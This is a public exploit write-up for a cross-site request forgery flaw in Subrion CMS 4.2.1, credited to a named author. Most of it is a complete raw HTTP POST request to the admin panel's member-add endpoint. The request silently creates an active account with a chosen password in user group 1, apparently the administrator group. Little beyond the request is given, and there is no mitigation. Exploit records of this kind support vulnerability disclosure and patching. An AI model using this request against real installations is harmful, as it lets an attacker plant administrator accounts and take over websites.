Subrion CMS 4.2.1 Cross Site Request Forgery

`# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)  
# Date: 2022-02-09  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://subrion.org  
# Software Link: https://subrion.org/download  
# Version: 4.2.1  
# Tested on: Windows 10  
  
# [ About - Subrion CMS ]:   
#Subrion is a PHP/MySQL based CMS & framework,  
#that allows you to build websites for any purpose,  
#Yes, from blog to corporate mega portal.  
  
# [ Description ]:  
# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,  
# With this vulnerability, authorized users can be added to the system.  
  
# [ Sample CSRF Request ]:  
  
POST /subrion/panel/members/add/ HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902  
Content-Length: 2522  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/subrion/panel/members/add/  
Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="__st"  
  
YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="username"  
  
Aryan  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="fullname"  
  
AryanChehreghani  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="email"  
  
[email protected]  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="_password"  
  
Test1234!  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="_password2"  
  
Test1234!  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="usergroup_id"  
  
1  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="website"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="phone"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="biography"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="facebook"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="twitter"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="gplus"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="linkedin"  
  
  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="email_language"  
  
en  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="sponsored"  
  
0  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="featured"  
  
0  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="featured_end"  
  
2022-03-09 12:03  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="status"  
  
active  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="save"  
  
1  
-----------------------------386122140640094420852486902  
Content-Disposition: form-data; name="goto"  
  
list  
-----------------------------386122140640094420852486902--  
  
`